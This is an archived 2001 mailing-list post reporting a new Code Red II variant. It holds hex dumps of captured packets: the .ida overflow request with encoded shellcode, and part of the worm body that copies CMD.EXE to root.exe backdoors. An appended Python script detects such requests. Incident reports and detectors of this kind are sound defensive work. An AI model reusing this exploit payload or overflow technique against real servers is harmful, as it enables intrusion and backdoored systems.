Hi folks,

since 2001-08-04 13:13:07 GMT+0200 the usual CodeScans are every now and then interrupted by a modified version. The first thing to notice is that the fill-up chars are changed from N to X. Overflow code seems to be the same, but the rest of the packet has changed. The snort alerts show first the usual ida attempt and then, directly following, an alert for CMD.EXE.

First packet dump (ida alert): length = 1460

000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
010 : 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  ?XXXXXXXXXXXXXXX
020 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
030 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
040 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
050 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
060 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
070 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
080 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
090 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
0a0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
0b0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
0c0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
0d0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
0e0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
0f0 : 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  X%u9090%u6858%uc
100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30  u6858%ucbd3%u780
120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  1%u9090%u6858%uc
130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63  u9090%u8190%u00c
150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35  3%u0003%u8b00%u5
160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25  31b%u53ff%u0078%
170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54  u0000%u00=a  HTT
180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74  P/1.0..Content-t
190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F  ype: text/xml.Co
1a0 : 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33  ntent-length: 33
1b0 : 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00  79 ........`....
1c0 : 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00  ....dg.6..dg.&..
1d0 : E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF  .....h......\...
1e0 : 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40  P.U...\...P.U..@
1f0 : 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00  .....X....U.=...
200 : 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6  ....=...........
210 : C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00  ...T....u..~0...
220 : 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A  ........F0......
230 : 00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24  ...CodeRedII...$
240 : FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50  .U.f.....8.....P
250 : FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50  .......j...P...P
260 : 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84  ..8...P.E..p....
270 : 00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4  .....8....thS.U.
280 : FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00  .U..E.i.T...,...
290 : 81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7  ..,.............
2a0 : 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00  .F4.E.Pj..u.....
2b0 : 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55  ......j.j..U.P.U
2c0 : D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00  .Ou..;...i.T....
2d0 : 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A  \&....\&.W.U.j.j
2e0 : 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45  ..U.j..U....F4)E
2f0 : 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0  .jd.U...<...P.U.
300 : 0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7  ...<...=....s...
310 : 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF  .>......s.f..p..
320 : FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00  ...f..r....P.d..
330 : 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8  ...t...j.j.j..U.
340 : 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80  ...t..E.j.Th~f..
350 : FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50  .u..U.Yj...p...P
360 : FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33  .u..U........tK3
370 : DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF  ..U.=3'..u?..h..
380 : FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7  .......l........
390 : 85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF  .`........E...d.
3a0 : FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF  ....h...Pj...`..
3b0 : FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66  .Pj.j..U..j.Th~f
3c0 : 04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00  ...u..U.Y...u1..
3d0 : 00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00  ...X-....j.h....
3e0 : 50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00  P.u..U.=....u.j.
3f0 : 6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF  j...\...P.u..U..
400 : 75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81  u..U..........w.
410 : C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00  ..........xu....
420 : F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06  ..`......d$.dg..
430 : 00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26  ..Xa..dg.6..dg.&
440 : 00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50  ..f.;MZu..K<.<.P
450 : 45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C  E..u..T.x...B..<
460 : 03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75  .KERNu..|..EL32u
470 : BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47  .3.I.r ...A..<.G
480 : 65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03  etPu..|..rocAu..
490 : 4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03  J.I...J$........
4a0 : 4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00  J.......D$$dg...
4b0 : 00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8  .Xa..Q....]..E..
4c0 : 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41  ....LoadLibraryA
4d0 : 00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43  ..u..U..E......C
4e0 : 72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF  reateThread..u..
4f0 : 55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63  U..E......GetTic
500 : 6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC  kCount..u..U..E.
510 : E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55  .....Sleep..u..U
520 : F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74  ..E......GetSyst
530 : 65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00  emDefaultLangID.
540 : FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65  .u..U..E......Ge
550 : 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79  tSystemDirectory
560 : 41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00  A..u..U..E......
570 : 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8  CopyFileA..u..U.
580 : 89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69  .E......GlobalFi
590 : 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45  ndAtomA..u..U..E
5a0 : D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41  ......GlobalAddA
5b0 : 74 6F 6D 41                                      tomA

Second alert (cmd.exe alert): length = 1460

000 : 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43  ..u..U..E......C
010 : 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55  loseHandle..u..U
020 : F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74  ..E......_lcreat
030 : 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F  ..u..U..E......_
040 : 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8  lwrite..u..U..E.
050 : E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC  ....._lclose..u.
060 : FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79  .U..E......GetSy
070 : 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89  stemTime..u..U..
080 : 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C  E......WS2_32.DL
090 : 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63  L..U..E......soc
0a0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00  ket..u..U..E....
0b0 : 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75  ..closesocket..u
0c0 : BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74  ..U..E......ioct
0d0 : 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45  lsocket..u..U..E
0e0 : A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75  ......connect..u
0f0 : BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65  ..U..E......sele
100 : 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00  ct..u..U..E.....
110 : 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8  .send..u..U..E..
120 : 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89  ....recv..u..U..
130 : 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61  E......gethostna
140 : 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00  me..u..U..E.....
150 : 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF  .gethostbyname..
160 : 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41  u..U..E......WSA
170 : 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC  GetLastError..u.
180 : FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33  .U..E......USER3
190 : 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00  2.DLL..U..E.....
1a0 : 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF  .ExitWindowsEx..
1b0 : 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84  u..U..E...E.i...
1c0 : 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1  ..@.E....xV4....
1d0 : C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3  ........<.t.<.t.
1e0 : C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1  ................
1f0 : E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8  ................
200 : E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF  ......... ......
210 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF  ................
220 : FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04  .............Y..
230 : 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F  .#...#.X.......
240 : 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3  t....t.;.X...t..
250 : 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D  h......\...P.U..
260 : BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E  ..\........\CMD.
270 : 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00  EXE.^.....cj....
280 : 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72  ..d:\inetpub\scr
290 : 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C  ipts\root.exe...
2a0 : 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8  $....\...P.U.j..
2b0 : 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C  +...d:\progra~1\
2c0 : 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C  common~1\system\
2d0 : 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B  MSADC\root.exe..
2e0 : 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA  .$....\...P.U...
2f0 : 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00  ....MZP.........
300 : FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC  ............@...
310 : 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C  ...........PE..L
320 : 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0  ....*%).........
330 : 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00  ................
340 : 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00  ............ ...
350 : 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00  .@..............
360 : 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00  ............@...
370 : 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00  ................
380 : 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10   ...............
390 : 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C  ............0...
3a0 : 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00  ................
3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10  ................
3c0 : 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00  ................
3d0 : 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00  .......... ..`..
3e0 : 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04  ........... ....
3f0 : 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00  ................
400 : 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10  ..@.............
410 : 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00  ...0............
420 : 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC  ..........@.....
430 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
440 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
450 : FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00  ................
460 : 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68  ..........h....h
470 : D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE  . @..a...... @..
480 : 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8  . @.....j.h. @..
490 : 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31  L........h.'...1
4a0 : 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A  .....h.$@.h?...j
4b0 : 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00  .h. @.h.....2...
4c0 : 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68  ..u&j.hT @.j.j.h
4d0 : 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF  H @..5.$@.......
4e0 : 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68  5.$@......h.$@.h
4f0 : 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80  ?...j.hX @.h....
500 : E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C  .......uU.. @..L
510 : 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68  ..... @..B...j.h
520 : B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8  . @.j.j.h. @..5.
530 : 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A  $@......j.h. @.j
540 : 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99  .j.h. @..5.$@...
550 : 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7  ....5.$@........
560 : 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0  ..$@.....h.$@.h.
570 : 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40   @.h.$@.j.U.5.$@
580 : 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B  ..`.....uI..$@..
590 : C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81  .t@.. @..>.t6Ff.
5a0 : 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20  ~.,,u...217....
5b0 : 40 00 89 35                                      @..5

CU
Sven

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sat Aug 04 2001 - 19:46:05 PDT
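The two things the post singles out (the filler byte changing from N to X, and the new body carrying the string CodeRedII) can be checked mechanically from a capture. The Python below is an added example, not code from the post or from any published Code Red analysis. It parses the request line, counts the filler run, expands each %uHHHH escape to the two bytes of a little-endian 16-bit code unit (so %ucbd3%u7801 becomes d3 cb 01 78, the 32-bit value 0x7801cbd3 that both variants carry in the request line), reads Content-length, and looks for the CodeRedII marker in the body. The two sample requests are constructed from the post's own first dump (truncated shortly after the marker; the N-filler one is the same request with the marker removed); the function and constant names are mine, and only requests whose filler is a run of N or X are recognised.

```python
"""Classify .ida overflow requests of the kind shown in the post.

Added example, not part of the original message. Assumption (hypothetical):
the input is the raw TCP payload of the HTTP request, as bytes.
"""
import re
from typing import Optional

# Constructed from the post's first dump: 224 'X' filler bytes, the
# %u-encoded overflow, the headers, and the first body bytes up to the
# "CodeRedII" marker. The real segment is 1460 bytes; this is a truncation.
CODE_RED_II_REQUEST = (
    b"GET /default.ida?" + b"X" * 224
    + b"%u9090%u6858%ucbd3%u7801" * 3
    + b"%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a"
    + b"  HTTP/1.0\r\nContent-type: text/xml\nContent-length: 3379 \r\n\r\n"
    + b"\xc8\xc8\x01\x00\x60\xe8\x03\x00\x00\x00\xcc\xeb\xfe"
    + b"CodeRedII\x00"
)

# Constructed: the same request shape with the 'N' filler of the original
# worm and no marker, so the two variants can be told apart.
CODE_RED_I_REQUEST = (
    CODE_RED_II_REQUEST.replace(b"X" * 224, b"N" * 224).split(b"CodeRedII")[0]
)

REQUEST_LINE = re.compile(
    rb"^GET /default\.ida\?([NX]+)(\S*)\s+HTTP/1\.[01]", re.IGNORECASE
)
RETURN_ADDRESS = 0x7801CBD3            # from %ucbd3%u7801 in the request line
RET_BYTES = RETURN_ADDRESS.to_bytes(4, "little")
MARKER = b"CodeRedII"
HEX_DIGITS = frozenset(b"0123456789abcdefABCDEF")


def decode_u_escapes(data: bytes) -> bytes:
    """Expand %uHHHH escapes to the two bytes of a little-endian 16-bit
    code unit; anything else (including a malformed %u) passes through."""
    out = bytearray()
    i = 0
    while i < len(data):
        if data.startswith(b"%u", i):
            hexpart = data[i + 2:i + 6]
            if len(hexpart) == 4 and all(c in HEX_DIGITS for c in hexpart):
                out += int(hexpart, 16).to_bytes(2, "little")
                i += 6
                continue
        out.append(data[i])
        i += 1
    return bytes(out)


def classify_ida_request(payload: bytes) -> Optional[dict]:
    """Return facts about an .ida overflow request, or None if it is not one."""
    head, _, body = payload.partition(b"\r\n\r\n")
    m = REQUEST_LINE.match(head)
    if m is None:
        return None
    filler, encoded = m.group(1), m.group(2)
    decoded = decode_u_escapes(encoded)
    cl = re.search(rb"Content-length:\s*(\d+)", head, re.IGNORECASE)
    filler_char = chr(filler[0]).upper()
    marker = MARKER in body
    return {
        "filler_char": filler_char,
        "filler_len": len(filler),
        "decoded_prefix": decoded[:8],          # nop nop pop eax push 0x7801cbd3
        "return_address_present": RET_BYTES in decoded,
        "content_length": int(cl.group(1)) if cl else None,
        "codered2_marker": marker,
        "variant": "Code Red II" if (filler_char == "X" or marker) else "Code Red",
    }


if __name__ == "__main__":
    for name, req in (("X filler", CODE_RED_II_REQUEST), ("N filler", CODE_RED_I_REQUEST)):
        print(name, classify_ida_request(req))
```

The filler character alone is a weak discriminator (any sender can change it), so the classifier also keys on the marker in the body; the decoded return-address bytes are what a content signature on the raw request line cannot see without the same %u expansion.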